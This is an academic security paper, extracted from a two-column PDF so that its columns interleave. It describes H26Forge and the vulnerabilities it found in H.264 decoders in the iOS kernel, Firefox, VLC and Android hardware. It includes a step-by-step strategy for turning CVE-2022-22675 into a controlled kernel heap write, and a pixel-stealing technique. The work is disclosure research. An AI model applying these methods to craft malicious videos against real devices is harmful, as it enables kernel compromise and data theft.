The Most Dangerous Codec in The World: Finding and Exploiting Vulnerabilities in H.264 Decoders
The Most Dangerous Codec in The World: Finding and Exploiting Vulnerabilities in H.264 Decoders
only recently moved video parsing into the iOS kernel. Not so. In fact, the YUV, macroblocks, and slices. A video is a collection of
first bug we identified was present in the kernel as far back as iOS 10. pictures or frames made up of pixels. Each pixel is broken
down into two components: luma (brightness) and chroma level properties of the video such as: profile, level, frame
(color). In H.264, luma is denoted as Y and chroma as U and size, cropping, etc. The spec allows for up to 32 SPSes
V, where the latter denote blue and red components, respec- in a video, but only one active at a time.
tively, and are used to recover the green component through a • Picture Parameter Sets (PPS): PPSes contain the com-
set of linear equations. Together these are called YUV values. pression parameters and picture reconstruction instruc-
In H.264, frames are split into groups of 16 × 16 pixels tions. The spec allows for up to 256 PPSes. A PPS must
called macroblocks, Macroblocks are the core unit used when reference a valid SPS in a video.
working with frames. Macroblocks are grouped together into • Instantaneous Decoder Refresh (IDR) NALUs: IDR
slices, which are used to create frames. NALUs contain slices and force the decoder to clear
Prediction and deblocking. H.264 compresses videos by out its DPB, therefore they should only contain Intra
relying on prediction techniques to recreate a video at the predicted slices (I slices), which do not reference any
endpoint. What is sent is the prediction instructions and the other frames. The first frame in a video is also expected
residue: the difference between the predicted frame and the to be an IDR NALU. An IDR NALU must point to a
actual frame. There are two types of prediction mechanisms valid PPS. Slices are split into slice headers with pic-
in H.264: Intra prediction and Inter prediction. ture information, and slice data with macroblocks that
contain the prediction instructions and residue.
Intra prediction looks for similarities within the same frame
• Non-IDR NALUs: Non-IDR NALUs contain slices that
at macroblock granularity. For a macroblock, the decoder
can be Intra or Inter predicted, but maintain the decoder
takes the edge pixels of neighboring macroblocks and predicts
state. Single Inter predicted slices (P slices) contain
the image using a linear combination of these values. It then
macroblocks that reference a single frame. Bipredicted
adds the residue to the predicted image to get the resulting
slices (B slices) can reference two frames. A non-IDR
output image.
NALU also points to a valid PPS.
Because images are sometimes simply translated across the
screen, Inter prediction looks for similarities across frames. Syntax elements may have dependencies that impact how
Inter-predicted frames copy macroblocks from reference subsequent ones are decoded. Modifying one syntax element
frames and apply residues to construct the final macroblock. changes not only how the picture is produced but also how
The decoder maintains a Decoded Picture Buffer (DPB), and the stream is read.
uses it to create a list of reference pictures. Different mac- Entropy encoding. To compress syntax elements, H.264
roblocks in the same picture can reference different frames in entropy encodes them with either stateless or stateful encoding
the buffer. If macroblocks in a frame uses only one reference procedures.
frame, then the frame is referred to as a P frame. If two refer- Stateless entropy encodings do not rely on neighboring val-
ence frames are used, then it is referred to as a B frame (for ues, and include binary, unary, and exponential-Golomb (exp-
biprediction). Golomb). All SPSes, PPSes, and slice headers are encoded in
Because frames are reconstructed at the macroblock level, this stateless manner and are often handled by software.
the decoder applies deblocking on the macroblock edges to Stateful entropy encodings rely on previously decoded val-
produce a smoother image. ues and are used within slice data to encode prediction modes
Profiles and levels. A profile in H.264 signals what features and residue values. The two encoding options are Context-
are used to decode the video. Features include the type of Adaptive Variable Length Coding (CAVLC) and Context-
entropy encoding and the presence of B frames. The most Adaptive Binary Arithmetic Coding (CABAC). CAVLC is
common profiles are Baseline, Main, and High. a run-length encoding, meaning that a value is sent along
The level of a video signals the possible frame size of the with the number of times the value consecutively appears.
video, how many frames to store in the DPB, and what the CABAC is an arithmetic encoding in which binary values are
maximum possible bit rate should be. recovered from a probability model that adjusts to the current
Syntax elements. Video reconstruction instructions are and previous syntax elements. Both CAVLC and CABAC
called syntax elements. The possible values each syntax el- are more resource-intensive than the stateless options and are
ement can be assigned are determined by the semantics of thus often handled by hardware.
the H.264 syntax elements. The values guide the decoder in Encoded value organization. Encoded NALUs can be or-
choosing prediction variables and recovering residue informa- ganized in one of two ways: in “Annex B” format, or AVCC
tion. format. “Annex B” format [23] denotes the beginning of a
Syntax elements are grouped together into Network Ab- NALU with start codes of value 0x00000001 or 0x000001.
straction Layer Units (NALUs). NALUs have a header signal- AVCC format includes the length of each NALU instead of
ing the type of content they contain. While the spec allows a start code, and is used in MP4 files, with the avcC four
for up to 32 different types of NALUs, the most common are: character code atom containing the SPS and PPS parameters
• Sequence Parameter Sets (SPS): these contain the high- for the video, and mdat atom containing the slices.
Both formats go through a process called emulation- Web. Web browsers have long allowed pages to incorporate
prevention, in which sequential 0x00 values within the video to play through the video HTML tag, leading to mul-
encoded stream are ‘escaped’ by inserting an emulation- tiple vulnerabilities in video decoding. For example, both
prevention byte, 0x03, after every two 0x00s. This is to Chrome and Firefox were affected by a 2015 bug in VP9
prevent the decoder from confusing the sequence as a start parsing.7 In Section 6.1 we describe a new vulnerability we
code. found in Firefox’s handling of H.264 files.
H.264 features and extensions. The H.264 specification has Despite this track record, more video processing attack
a collection of features that are enabled by different profiles. surface is being exposed to the Web platform. Media Source
Arbitrary Slice Ordering (ASO) is an error resilience feature Extensions (MSE) and Encrypted Media Extensions (EME)
that allows for frames to be made up of many slices that can have been deployed in major browsers; the WebCodecs ex-
arrive at any time. Flexible Macroblock Ordering (FMO) is tension [1], currently only deployed in Chrome, will allow
like ASO, but also allows for macroblocks to be arranged in websites direct access to the hardware decoders, completely
different shapes. Both are part of the Baseline profile. skipping over container format checks.
Since its introduction, the specification has added exten- Modern browsers carefully sandbox most kinds of media
sions for new applications and scenarios. Two notable ones processing libraries, but they call out to system facilities for
are Scalable Video Coding (SVC) and Multiview Video Cod- video decoding. Hardware acceleration is more energy effi-
ing (MVC), which allow for multiple sizes in one encoded cient; it allows playback of content that requires a hardware
video or multiple angles in a single video, respectively. root of trust [38]; and it allows browsers to benefit from the
patent licensing fees paid by the hardware suppliers.8
Decoding pipeline. We now describe how the components
are combined to decode a typical H.264 video. Online platforms. Video transcoding pipelines, such as at
First, the decoder is set up by passing in an SPS and a PPS YouTube [40], and Facebook [26], handle user-generated con-
with frame and compression related properties. Then the de- tent, which may contain videos that are not spec-compliant.
coder receives the first slice and parses the slice header syntax This could lead to denial-of-service, information leakage
elements. The decoder then begins a macroblock-level recon- from the execution environment or other processed videos,
struction of the image. It then entropy decodes the syntax or even code execution.
elements and passes them to either a residue reconstruction
path or through a frame prediction path with previously de- 2.3 Hardware video decoding
coded frames. Then the predicted frames are combined with
the residue, passed through a deblocking engine, and finally Video decoding in modern systems is accelerated with custom
stored in the DPB, where the frames can be accessed and hardware. The media IP included in SoCs or GPUs is usually
presented. licensed from a third party. In one notable example, iPhone
SoCs through the A11 include Imagination Technologies’
D5500 media IP (see Section 5), as do the SoCs in several
2.2 Software systems that manipulate video Android phones we study, with very different kernel drivers
A wide range of software systems handle untrusted video files, layered on top.
providing a broad attack surface for codec bugs. OS integration. IP vendors build drivers for their hardware
An important observation is that hardware-assisted video video decoders, which are then called by the OS through their
decoding bypasses the careful sandboxing that is otherwise own abstraction layer. The drivers will prepare the hardware
in place to limit the effects of media decoding bugs. to receive the encoded buffers often through shared memory.
Messengers. Popular messengers will accept video attach- In this section, we discuss the different OS layers provided to
ments in messages and provide a thumbnail preview noti- interface with drivers.
fication. In the default configuration of many messengers, While Stagefright is Android’s Media engine,9 Android
the video is processed to produce the thumbnail without user uses OpenMAX (OMX) to communicate with hardware
interaction, creating a zero-click attack surface. drivers. OMX abstracts the hardware layer from Stagefright,
There are many examples of video issues on mobile de- allowing for easier integration of custom hardware video de-
vices. Android has had historical issues in its Stagefright coders.
library for processing MP4 files [10, 11]. As we discuss Other operating systems similarly have their own abstrac-
in Section 5, video thumbnailing and decoding constitutes tion layer. The Linux community has support for video de-
exploitable attack surface in Apple’s iMessage application
advisories/2022/.
despite the BlastDoor sandbox [18]. Third-party messengers 7 CVE-2015-1258 and https://crbug.com/450939 for Chrome; CVE-
can also be affected. In September, WhatsApp disclosed a 2015-4506 and https://bugzilla.mozilla.org/show_bug.cgi?id=
critical bug in its parsing of videos on Android and iOS.6 1192226 for Firefox.
8 For example, Firefox won’t play H.264 videos absent hardware support.
6 CVE-2022-27492, https://www.whatsapp.com/security/ 9 Online: https://source.android.com/docs/core/media.
Table 1: Companies that produce hardware video de- H26FORGE
coders. Inputs Input Handling Syntax Manipulation Output Handling Outputs
offset b, is recorded as A[i] ← 8(b − i). The 257th EPB overwrites i with 17 An H.265 video can have at most 65 RPSes: 64 in the SPS and 1 in a
8(b257 − 256), and as a result the 258th EPB stores 8 b258 − 8(b257 − 256) ; slice header. AppleD5500.kext’s SPS RPS array is length 65 to accommodate
NALU length limits keep b258 from being more than 8 times b257 . this, but it does not impact our analysis.
the context object is freed. By overwriting this pointer with the SPS object, this overflow can overwrite at most 832 bytes
the address of a fake object that itself points to a fake vtable, past the SPS object.
we can arrange to have any address of our choosing called in The SPS object is contained in an array of length 32 in an
place of the legitimate destructor.18 AppleAVD.kext H.264 User Context. The SPS is indexed by
We did not attempt to develop an end-to-end exploit chain; its seq_parameter_set_id, with subsequent SPSes with the
however, Apple’s assessment was that this bug, like Bug 1, same ID overwriting previously decoded ones. Immediately
may allow an app “to execute arbitrary code with kernel priv- after the SPS array is a PPS array of length 256, similarly
ileges.” indexed by pic_parameter_set_id. This means that an
H26F ORGE was crucial in the development of this video, overflowing HRD parameter will impact either a neighboring
as given the lack of byte-alignment in exp-Golomb encoded SPS or PPS, depending on the seq_parameter_set_id. An
values, hand tuning this file would be difficult. Updating the SPS object is 2224 bytes long and a PPS object is 604 bytes
video to target new addresses, or overwrite another object is long, so we can either overwrite the first part of a neighboring
straightforward via our video transform. SPS or completely rewrite the PPS at index 0 along with the
start of the PPS at index 1.
For the overwrite to have an effect, though, the overflowing
5.3 Interactive testing HRD parameter must be decoded after a benign SPS or PPS
has already been decoded to modify what the parameters
The third way an analyst can use H26F ORGE is to interac- should be, otherwise anything written in the overflowed space
tively test video decoding as part of a complete examination, will be cleared out when decoding the benign SPS or PPS.
or even root-cause analysis, of an in-the-wild exploit. For
The Project Zero proof-of-concept. Using H26F ORGE,
example, CVE-2022-22675 is an out-of-bounds write due to
we are able to explain why the proof-of-concept video in
a missing bounds check in the AppleAVD.kext affecting iOS
the Project Zero writeup does not cause a crash. First, the
versions up to 15.4. Google Project Zero’s write up of the
video NALUs are not properly ordered. It starts with an SPS
bug [43] includes a partial proof-of-concept video which does
of ID 31 containing the out-of-bounds cpb_count_minus1,
not lead to a crash.
a PPS of ID 0, and a slice pointing to PPS 0. As is, the
We reverse engineered AppleAVD.kext and used a kernel malformed SPS would be decoded before the benign PPS, thus
debugger to test our hypotheses about the bug and its effects. any overwritten values would be ignored by the subsequent
H26F ORGE was crucial for producing the video inputs for parsing of the PPS. Second, the PPS points to an SPS of ID
these debugging sessions. 0, but since that does not exist at decoding time, the decoder
Notation. When describing SPSes and PPSes, we include halts. This proof-of-concept video is quite large, at 20 MB,
the ID in the subscript (e.g., SPSID , PPSID ). For slices we but we verified by stepping through the Corellium kernel
include the PPS ID it points to in the subscript and the type debugger that decoding stops when the first slice cannot find
Type a valid SPS.
in a superscript (e.g., SlicePPS ID ).
The CVE-2022-22675 bug. This bug was a missing bounds An H26F ORGE-produced proof-of-concept. We outline
check for the cpb_count_minus1 syntax element located in the steps necessary to construct a video that induces a con-
a function called parseHRD which recovers the hypothetical trolled kernel heap overflow by overwriting a PPS parameter.
reference decoder (HRD) parameters, nested within SPS pars- Figure 3 shows our overall strategy. More details about our
ing. SPSes can have two different HRD parameters, and their final step are in Appendix A.
usage and syntax elements are described in Annexes C and E Step 1: correct ordering. We use H26F ORGE to generate a
of the H.264 spec [23]. According to the spec, cpb_count_ video with the following NALUs: SPS0 , PPS0 , SPS0 , SliceI0 ,
minus1 should have a maximum possible value of 31, but and SliceP0 . The second SPS NALU is where the parseHRD
because there is no bounds check and the value is exp-Golomb overflow will exist to corrupt PPS0 .
encoded, we can set it to the maximum value AppleAVD.kext Step 2: fix the IDs. We create a video transform to adjust
can store: 255. This parameter is used as a loop bound to parameter IDs. We set the second SPS’s ID to 31 so it will
parse two exp-Golomb encoded uint32 values that are not be stored at the end of the SPS array. With H26F ORGE we
bounds checked, and an additional single bit. As these are produce both a raw H.264 file and an MP4 video 19 with the
stored in arrays of length 32, when the counter goes past the following order: SPS0 , PPS0 , SPS31 , SliceI0 , SliceP0 .
expected length AppleAVD.kext will begin to write into the
19 MP4 files contain an avcC atom with all SPSes and PPSes together.
rest of the SPS object and then past the SPS’s allocated mem-
MP4 parsers will decode all SPSes, then PPSes, which conflicts with the
ory. Because of where the second HRD parameters are in desired order of events. The MP4 muxer in H26F ORGE is modified to
only add the first observed SPS and PPS to the avcC atom, and subsequent
18 Arm Pointer Authentication, which would have prevented us from faking parameter sets to mdat atoms. Thus, we cannot hit the vulnerable code-path
a vtable, was not introduced until the Apple A12 [6], whereas the last Apple by thumbnailing, but may be able to target local privilege escalation. An SPS
SoC to use AppleD5500.kext was the A11. overwrite may be possible through thumbnailing.
H.264 Bitstream H.264 User Context in Memory in the iOS kernel debugger while playing the video from the
SPS PPS Slices
previous step allows us to inspect memory and identify write
SPS0
* targets in the PPS. We describe an exploit strategy that uses
(1) ... 0 ... 31 0 ... 255 0 1 ... 599 ...
PPS0
0x00..00 0xff..ff
the capability described so far to overwrite the num_ref_idx_
l0_active_minus1 PPS parameter.
SPS PPS Slices This parameter is used as a loop bound in prediction weight
SPS31 (2) ... 00 ...
... *
31
31 0 ... 255 0 1 ... 599 ...
table syntax parsing, parsePredWeightTable, in which cer-
0x00..00 0xff..ff
parseHRD tain 16-bit values are copied from the bitstream to an array
SPS PPS Slices
member variable in the H.264 User Context object. According
(3) ... 0 ... * *0
31 ... 255 0 1 ... 599 ... to the spec, num_ref_idx_l0_active_minus1 should be at
SliceI0 0x00..00 0xff..ff most 31, a limit that AppleAVD.kext correctly checks when
num_ref_idx_default_active_l0
parsing PPS parameters. By overwriting this parameter with
SliceP 1 SPS PPS Slices
Bn larger values using the first-stage overflow, we can exceed
(4) ... 0 ... * *0
31 ... 255 0 *1 ... 599 ... Bn
its limit and cause the parsePredWeightTable loop to write
0x00..00 0xff..ff
parsePredWeightTable past the end of the array allocated for it within the H.264 User
SliceP2
Bn-1
SPS PPS Slices Context object, triggering a second overflow. This is depicted
(5) ... 0 ... * *0
31 ... 255 0 *1 *... 599 B...
1..n-1 Bn in part (3) of Figure 3.
0x00..00 0xff..ff In a video transform, we set cpb_count_minus1 to
SlicePn
B1 stop looping at the position it can write num_ref_idx_l0_
Decoded slice Write
headers direction active_minus1, and use one of the exp-Golomb encoded
HRD parameters to set it to its maximum value of 255.
Figure 3: Exploiting CVE-2022-22675. The left-hand side
Step 5: satisfy constraints and enable second overflow.
shows the correctly ordered H.264 bitstream, read from top
Arranging for the first overflow to overwrite num_ref_idx_
to bottom, and the right-hand side shows the decoded con-
l0_active_minus1 with a larger value is not enough. We
tents in memory as they are filled in. (1) The initial SPS
must make sure that other PPS parameters we overflow take on
and PPS parameters are read, each with ID 0 (SPS0 , PPS0 ).
reasonable values to avoid an early exit from video decoding
(2) An SPS with ID 31 is parsed, where we use an out-of-
because of a failed AppleAVD.kext check. We must also make
bounds cpb_count_minus1 in parseHRD to overwrite PPS0 .
sure that slice headers that refer to the PPS parameters we
(3) PPS0 is overwritten with an out-of-bounds num_ref_idx_
overwrite are Inter predicted and do not have num_ref_idx_
l0_active_minus1, used in Slice decoding. (4) The over-
active_override_flag set; otherwise prediction weight
written num_ref_idx_l0_active_minus1 causes a second
table syntax parsing is skipped. We must also fill in the
overflow in parsePredWeightTable, writing a 16-bit value
slice headers with enough prediction weight table parameters
Bn greater than 255 at a controlled offset away, with inter-
to account for the overwritten loop bound, not the original
mediate memory set to a default value. (5) Arbitrary length
maximum of 31.
values can be written by adjusting the offset in each subse-
quent slice, writing the values backwards. With these additional constraints satisfied, we can trigger a
kernel panic due to an out-of-bounds write past the allocated
memory of the H.264 User Context.
Step 3: add the overwrite. With our video that contains
the IDs in the correct order, we can now change the syntax Step 6: controlling the second overflow. Unfortunately, the
elements of SPS31 to trigger CVE-2022-22675. Parts (1) and crashing video is not immediately useful for heap corruption,
(2) of Figure 3 illustrate the ordering and this overflow. for two reasons. First, the overwrite we trigger is so large
The HRD parameters are part of an optional syntax element that it overflows not only the User Context but also the kernel
nested inside an SPS. We first use a video transform to ensure heap as a whole, because the loop bound is derived by sign
that the parameters will be parsed, then we set cpb_count_ extending the num_ref_idx_l0_active_minus1 parameter
minus1 to 255. To understand how the syntax elements in the from 8 bits to 32. Second, the 16-bit values the loop writes to
loop are used during the overwrite, we set both exp-Golomb the heap are badly constrained: Each must be between 0 and
encoded values to a noticeable pattern, and all the byte-sized 255 or the loop stops after writing it.
flag values to true. These two problems neatly solve each other.
We now have a video with the following order: SPS0 , By arranging for the bitstream to include a larger-than-255
PPS0 , SPS∗31 , SliceI0 , SliceP0 , where SPS∗31 contains the over- value when we have written enough, we can get the loop to
write. exit early despite the huge loop bound. The 16-bit values
before the last one must still be between 0 and 255. Part (4)
Step 4: control the overwrite location, and produce a sec- of Figure 3 shows this arrangement, with the last value written
ond overflow. Setting a breakpoint at slice header decoding denoted Bn .
If we include further slices that reference the PPS param- regardless of actual video encoding size. Firefox relied on
eters we overflowed, we can cause the overflowing loop to this MP4 metadata to create video frames, but because the
execute again, copying a different part of the bitstream into encoded frame size was larger than expected, we were able to
the same User Context object. By working backwards, with trigger a buffer overflow in the GPU utility process. This was
each slice writing fewer bytes than the ones before, we avoid patched by changing the utility process to rely on the returned
undoing the work done earlier in the exploit. This technique frame parameters rather than the stored metadata.
is illustrated in part (5) of Figure 3. The first slice writes the Due to the GPU utility process crashing, Firefox fell back
out-of-bounds value Bn and stops; the second writes Bn−1 and to decoding the video in software. From the provided analysis,
stops; and so on, until after k slices we have written 2k arbi- the Firefox software decoder took frame size parameters from
trary bytes at an arbitrary offset from the User Context object. only the first SPS and did not adjust to SPS changes. Thus,
We provide more details on how we arrange the bitstream in because our encoded video has an initial SPS with frame size
Appendix A. parameters bigger than the second SPS, Firefox was unable
Exploitation. We have used H26F ORGE to automate the to fill up the frame contents of slices after the SPS change,
creation of a video that uses the described exploit strategy to and we were able to read the contents of memory. Figure 4
write an attacker-chosen payload at an attacker-chosen offset shows what the user saw. Firefox patched this by adding code
from the H.264 User Context object in the iOS kernel heap. to use the correct SPS when creating a frame size.
As with our Bug 3 from Section 5.2, leveraging this heap- H26F ORGE can set the width and height of an MP4 to
overflow primitive into arbitrary kernel execution is likely to either the actual frame size, a random value, or a user specified
require heap grooming and a kernel address disclosure bug, value, without having to worry about MP4 atoms. It can also
with the presence of pointer authentication in SoCs that use generate videos with multiple SPSes. By adjusting the SPS
AppleAVD compounding the challenge. A recent presentation frame size parameters with a video transform, H26F ORGE
by Tarakanov and Labunets discusses these challenges and can control how much information is read out.
proposes some AppleAVD exploitation strategies [45].
6.2 VLC use-after-free
6 More H26F ORGE Findings On VLC for Windows version 3.0.17, we discovered a use-
after-free vulnerability in FFmpeg’s libavcodec that arises
We describe more issues discovered by using H26F ORGE when interacting with Microsoft Direct3D11 Video APIs. We
as a grammar-aware fuzzer and to generate proof-of-concept found this by testing generated videos in VLC. The bug is
videos. We start by showing that heavily fuzzed desktop triggered when an SPS change in the middle of the video
software, such as Firefox and VLC, can have vulnerabilities forces a hardware re-initialization in libavcodec. If exploited,
unearthed through our technique of producing H.264 videos an attacker could gain arbitrary code execution with VLC
with unexpected syntax element values. Then, we describe privileges. We reported this issue to VLC and FFmpeg, and
issues that primarily affect hardware video decoding, such as they have fixed it in VLC version 3.0.18 and FFmpeg commit
fingerprinting and vulnerable implementations. cc867f2.20
The use-after-free comes from libavcodec’s multithreaded
handling of hardware contexts. VLC will create a libavcodec
6.1 Firefox crash and information leak context, and send each NALU to this context for processing.
We tested generated videos on Firefox 100 as described in Libavcodec assigns each NALU to a thread, which interacts
Section 5.1, and discovered an out-of-bounds read that causes with the hardware context to decode a frame. When a libav-
a crash of the Firefox GPU utility process and a user-visible codec thread encounters a new SPS, it frees the old hardware
information leak. The issue arises from conflicting frame context and re-initializes a new one with the new SPS param-
sizes provided in the MP4 container as well as multiple SPSes eters. It then sends the updated hardware context to the other
across video playback. Note that both the crash and infor- threads for synchronization.
mation leak are caused by a single video. To exploit this Unfortunately, libavcodec forgot to update the main thread
vulnerability an attacker has to get the victim to visit a web- with this new context, so when the video finishes and VLC
site on a vulnerable Firefox browser. We reported this finding tries to close the libavcodec context, the stale hardware con-
to Mozilla, and it has been assigned CVE-2022-3266 and text address is freed again. Before freeing the address, libav-
patched in version 105 [33]. codec checks the data at the address to determine whether to
Since Firefox cannot play raw H.264 files, we mux our call a virtual destructor. It is possible that an attacker-groomed
generated videos into an MP4 file. The MP4 file contains heap may lead to a use-after-free and code execution as the
frame width and height metadata, but this information does VLC process.
not need to match the encoded data. For every MP4 video 20 Online: https://github.com/FFmpeg/FFmpeg/commit/
we created, we set the width and height to a small constant, cc867f2c09d2b69cee8a0eccd62aff002cbbfe11.
Figure 5: Luma Chroma Thief. On the left, we vertically
Intra predict at the top-most row of macroblocks. On the
right, we horizontally Intra predict at the left-most column of
macroblocks.
Device Type SoC VPU HDT OMX Name Android Version Kernel
Odroid C2 SBC Amlogic S905 Amlogic Video Engine 1 OMX.amlogic.avc.decoder.awesome 6.0.1 3.14.29
Pine A64 SBC Allwinner A64 CedarV 4 OMX.allwinner.video.decoder.avc 7.1.2 3.10.105
Huawei Honor 9x Phone HiSilicon Kirin 710 HiSilicon VDEC V200 16 OMX.hisi.video.decoder.avc 9 (EMUI 9.1.0) 4.9.148
HP Chromebook 11a Netbook MediaTek MT8183 MediaTek VPU 8 c2.vda.avc.decoder 9 5.10.114
Lenovo TB-7305F Tablet MediaTek MT8321 MediaTek VPU 4 OMX.MTK.VIDEO.DECODER.AVC 9 4.9.117
Xiaomi Redmi Note 8 Pro Phone MediaTek Helio G90T MediaTek VPU 16 OMX.MTK.VIDEO.DECODER.AVC 9 (MIUI 11.0.4.0) 4.14.94
Xiaomi Redmi 9C Phone MediaTek Helio G35 MediaTek VPU 16 OMX.MTK.VIDEO.DECODER.AVC 10 (MIUI 12.0.7) 4.9.190
Huawei MediaPad M5 Lite Tablet HiSilicon Kirin 659 PowerVR D5500 8 OMX.IMG.MSVDX.Decoder.AVC 8 (EMUI 8) 4.4.23
Huawei Honor 8 (FRD-AL10) Phone HiSilicon Kirin 950 PowerVR D5500 8 OMX.IMG.MSVDX.Decoder.AVC 7 (EMUI 5.0.1) 4.1.18
Dragonboard 410C SBC Qualcomm Snapdragon 410 Qualcomm Venus 8 OMX.qcom.video.decoder.avc 5.1.1 3.10.49
Galaxy Tab E Tablet Qualcomm Snapdragon 410 Qualcomm Venus 8 OMX.qcom.video.decoder.avc 7.1.1 3.10.49
Nano Pi M4 SBC Rockchip RK3399 RKVdec/Hantro 6 OMX.rk.video_decoder.avc 8.1 4.4.167
Odroid XU4 SBC Samsung Exynos 5422 Samsung MFC 8 OMX.Exynos.AVC.Decoder 4.4.4 3.10.9
VANKYO MatrixPad S21 Tablet UNISOC SC9863A UNISOC VSP 10 OMX.sprd.h264.decoder 9 4.4.147
VANKYO MatrixPad S10 Tablet UNISOC SC7731E UNISOC VSP 10 OMX.sprd.h264.decoder 9 4.4.147
cently decoded, or (3) there is no other decode going on at the Table 3: Luma Chroma Thief results for test devices. We
same time, we can recover uninitialized data from the decoder. run both horizontal (HLCT) and vertical (VLCT) LCT in
To generate LCT, we start with a video that contains an SPS, parallel with another video and sequentially right after another
PPS, and I slice and we remove all the residue, disable the video has been decoded. Device are grouped by VPU.
deblocking filter, and set the macroblocks to be a target mac-
roblock type. Listing 1 shows a video transform to generate Device HLCT-P HLCT-S VLCT-P VLCT-S
LCT. Based on the specification, we can do Intra prediction at Odroid C2 N/A Thief N/A Thief
Pine A64 Uninit Uninit Uninit Uninit
three different granularities: 16 × 16, 8 × 8, and 4 × 4. Note Huawei Honor 9x 0x80/Thief 0x80/Uninit 0x80/Thief 0x80/Uninit
that the 8 × 8 granularity forces the block to go through the HP Chromebook 11a Y:0x10; Y:0x10; Uninit Uninit
UV:0x80 UV:0x80
deblocking filter [30], so the 8 × 8 predicted blocks will not Lenovo TB-7305F Y:0x10; Y:0x10; Y:0x10; Y:0x10;
provide the exact recovered values. When testing LCT on UV:0x80 UV:0x80 UV:0x80 UV:0x80
Xiaomi Redmi Note 8 Pro 0x00 0x00 Uninit Uninit
devices, we find all granularities produce consistent results. Xiaomi Redmi 9C 0x00 0x00 Uninit Uninit
Even though only the top-most or left-most columns will read Huawei MediaPad M5 Lite 0x80 0x80 0x00 0x00
Huawei Honor 8 (FRD-AL10) 0x80 0x80 0x00 0x00
from buffers with unexpected values, we copy the same Intra Dragonboard 410C 0x00 0x00 Thief Thief
prediction mode for the rest of the slice to amplify the data. Galaxy Tab E 0x00 0x00 Thief Thief
Nano Pi M4 0x80 0x80 0x80 0x80
We test the vertical and horizontal LCT videos against a Odroid XU4 0x00 0x00 0x80 0x80
target video when running in parallel and sequentially. Paral- VANKYO MatrixPad S21 Thief Uninit Thief Uninit
VANKYO MatrixPad S10 No Output No Output Thief Uninit
lel decoding means we start the target video, start LCT, and Thief: LCT was successful in stealing pixels.
stop the target video. In this scenario, each video is consum- Uninit: LCT was able to read uninitialized data.
No Output: The surface value was black, and output to a file was empty.
ing a single thread of the hardware video decoder. When Hex numbers: the value of the indicated component(s) (e.g., Y:0x10; UV:0x80) or the
testing sequentially, we play LCT after the target video has value of each YUV component (e.g., 0x80).
N/A: The Odroid C2 has a single-threaded decoder, so parallel decoding is not possible.
stopped, thus testing if there is any leftover data in the hard- 0x80/Thief/Uninit: the Honor 9X produced a frame that was mostly error concealed,
ware video decoder. Figure 6 shows what LCT looks like on except for a single macroblock.
the VANKYO S21, which allows for parallel stealing. Table
3 shows the results for all our target devices. ements. First, the first_mb_in_slice slice header syntax
Because the values that we modify are in the CAVLC/ element is used as a part of the ASO feature to denote where
CABAC encoded macroblock layer, the issues lie at the hard- in the frame to start writing. Second, the mb_skip_run slice
ware video decoder level, either in the firmware or hardware. data syntax element allows CAVLC encoded videos to skip
Furthermore, all layers (browser, decoder, kernel driver) that macroblocks in the frame that are the same as references ones.
inspect the video cannot determine whether a video contains The log messages indicated that either a first_mb_in_
LCT logic without decoding it completely. slice or mb_skip_run larger than the frame size may lead
to an out-of-bounds access. We found evidence of this in the
6.3.3 Hardware memory traversal D5500 in Kirin SoCs, but were not able to produce further
results. For the MediaTek VPU we are able to show a denial-
During our analysis, we found log messages from the D5500 of-service vulnerability on the Redmi Note 8 Pro. Both issues
in Kirin SoCs and the MediaTek VPU that suggest the ability are available from video thumbnailing, so an attacker just has
to traverse hardware memory using two different syntax el- to send a video where a victim may get a thumbnail.
firmware runs on a Imagination Technologies’ custom DSP
architecture called MTX [21], for which we were not able to
find adequate tooling.
Redmi Note 8 Pro MediaTek VPU. A video with an mb_
(a) Target skip_run larger than the frame size leads to a denial-of-
service vulnerability on the MediaTek VPU located in the
Redmi Note 8 Pro. The MediaTek Security Team reported
that they were able to reproduce this issue in Android 9 and
10, but were unable to do so in Android 11 or later.
(b) PV 4 × 4 (c) PV 8 × 8 (d) PV 16 × 16 The MediaTek Helio G90T SoC implements a security
feature called Device Access Permission Control driver (de-
vapc). Devapc enforces device-defined access controls using
TrustZone, and triggers a violation interrupt on unauthorized
accesses. Attempting to decode a video with an out-of-bounds
mb_skip_run triggers a devapc violation and causes the de-
(e) SV 4 × 4 (f) SV 8 × 8 (g) SV 16 × 16 vice to reboot. The reboot happens because the application
processor attempts to access video decoder memory at an
out-of-bounds address, and devapc calls BUG() after logging
the violation.22 The crash does not happen every time, so we
suspect it is a race condition in the MediaTek video decoder
(h) PH 4 × 4 (i) PH 8 × 8 (j) PH 16 × 16 driver. Although other MediaTek VPUs logged violations,
they did not cause reboots.
(k) SH 4 × 4 (l) SH 8 × 8 (m) SH 16 × 16 We found a heap overflow in Kirin SoCs running the D5500
video decoder, which includes the Honor 8 and the MediaPad
Figure 6: LCT results on the VANKYO S21 with a M5 Lite. The video uses the FMO feature of H.264; Kirin
UNISOC VSP. The target video is the opening frame of Big SoCs were among the few to support this feature. This vulner-
Buck Bunny [42]. 8 × 8 Intra prediction goes through an extra ability is available from thumbnailing, so an attacker just has
deblocking process, regardless of settings. Parallel vertical to send a video to a victim. This vulnerability does not lend
(PV) LCT takes the bottom-most pixels of the target video, itself to more than a denial-of-service as kernel guard pages
and parallel horizontal (PH) LCT takes the right-most pixels prevent neighboring heap allocations from being impacted.
from the bottom-right-most macroblock. We were not able FMO allows a frame to be split into up to eight slice groups,
to derive a pattern from the recovered uninitialized data in so that if any part is lost in transit the image can still be par-
sequential vertical (SV) and sequential horizontal (SH) LCT. tially reconstructed. FMO is signaled in the PPS by denoting
the number of slice groups to use as well their organization
Kirin SoC D5500. In Kirin SoC devices with the D5500 within a frame. Because each macroblock in the frame can
decoder, we found that we can traverse the decoder stream be in one of eight slice groups, the decoder maintains a map
buffer heap virtual memory by controlling the frame size in of macroblock address to slice group called the Slice Group
the SPS along with the first_mb_in_slice. By adjusting Map (SGM). The D5500 decoder allocates a hardware SGM
these syntax elements with a video transform, we could trigger of size 3600 bytes and enforces this limit by only allowing
MMU page faults that the kernel would log in the stream videos of width 1280 pixels to have FMO support. But be-
buffer heap address range. Per the source code,21 the stream cause the height component is not checked, it is possible to
buffer heap contains structures to decode the video, such as create an SGM larger than 3600 bytes, causing a heap over-
firmware contexts, SPSes, and PPSes, and are managed by flow. The user-side library allocates an SGM that is as large
the device, which may contain device corruptable data. as the frame and passes it to the driver. When the driver at-
We were limited in our ability to determine what the ex- tempts to copy the user SGM buffer to the hardware, it writes
act read or write operations were doing because the D5500 past the allocated space and triggers a kernel panic due to a
